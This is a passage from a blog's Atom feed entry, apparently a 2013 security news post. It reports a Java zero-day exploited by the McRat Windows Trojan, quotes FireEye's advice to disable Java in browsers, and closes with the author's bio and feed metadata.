McRat is a Windows Trojan therefore Windows users are prone to such an attack. It is not clear whether Mac and Linux users are at risk as well.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;According to FireEye researchers;&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="background-color: white; color: #222222; line-height: 25px; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;i&gt;We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to 'High' and do not execute any unknown Java applets outside of your organization.&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 15px; line-height: 25px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
If you are a Windows user and fear such an attack, we would suggest an uninstallation of Java because, as yet, there are no solutions to this problem.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The next security updates are scheduled for 16th April but Oracle will be forced to push an Emergency update in the light of current events.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Cheers!&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;About the Author:&lt;/b&gt;&lt;/div&gt;
&lt;div&gt;
This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TP5RYhhO8xc:0iSwkZ9GqvM:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TP5RYhhO8xc:0iSwkZ9GqvM:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TP5RYhhO8xc:0iSwkZ9GqvM:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=TP5RYhhO8xc:0iSwkZ9GqvM:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=TP5RYhhO8xc:0iSwkZ9GqvM:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/TP5RYhhO8xc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/944568494266277642/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/944568494266277642?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/944568494266277642?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/TP5RYhhO8xc/java-zero-day-vulnerability-spotted-in.html" title="Another Java Zero-Day Vulnerability Spotted In The Wild" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-xeEZW5thXC8/UTRUfCwYDdI/AAAAAAAAA_w/XDA-LwYoC2o/s72-c/Java_Bullet.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html</feedburner:origLink></entry></feed>
